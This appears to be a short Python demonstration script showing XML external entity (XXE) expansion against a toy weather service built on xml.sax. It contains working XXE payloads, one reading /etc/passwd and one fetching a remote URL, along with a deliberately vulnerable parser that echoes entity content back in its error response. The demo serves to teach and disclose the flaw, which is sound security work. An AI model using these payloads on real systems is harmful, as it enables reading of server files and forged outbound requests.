blob: 7c5ab0cdf23d6c74516556a98afb170f0f06eab0 (
plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
|
#!/usr/bin/python
"""Demo exploit for external entity expansion
Author: Christian Heimes
"""
import sys
from xml.sax import ContentHandler
from xml.sax import parseString
xml_good = """<weather>Aachen</weather>"""
xml_bad_file = """<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE weather [
<!ENTITY passwd SYSTEM "file:///etc/passwd">
]>
<weather>&passwd;</weather>
"""
xml_bad_url = """<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE weather [
<!ENTITY url SYSTEM "http://hg.python.org/cpython/raw-file/a11ddd687a0b/Lib/test/dh512.pem">
]>
<weather>&url;</weather>
"""
class WeatherHandler(ContentHandler):
def __init__(self):
ContentHandler.__init__(self)
self.tag = "unseen"
self.city = []
def startElement(self, name, attrs):
if name != "weather" or self.tag != "unseen":
raise ValueError(name)
self.tag = "processing"
def endElement(self, name):
self.tag = "seen"
self.city = "".join(self.city)
def characters(self, content):
if self.tag == "processing":
self.city.append(content)
def weatherResponse(xml):
handler = WeatherHandler()
parseString(xml, handler)
if handler.city == "Aachen":
return "<weather>The weather in %s is terrible.</weather" % handler.city
else:
return "<error>Unknown city %s</error>" % handler.city[:500]
for xml in (xml_good, xml_bad_file, xml_bad_url):
print("\nREQUEST:\n--------")
print(xml)
print("\nRESPONSE:\n---------")
print(weatherResponse(xml))
print("")
|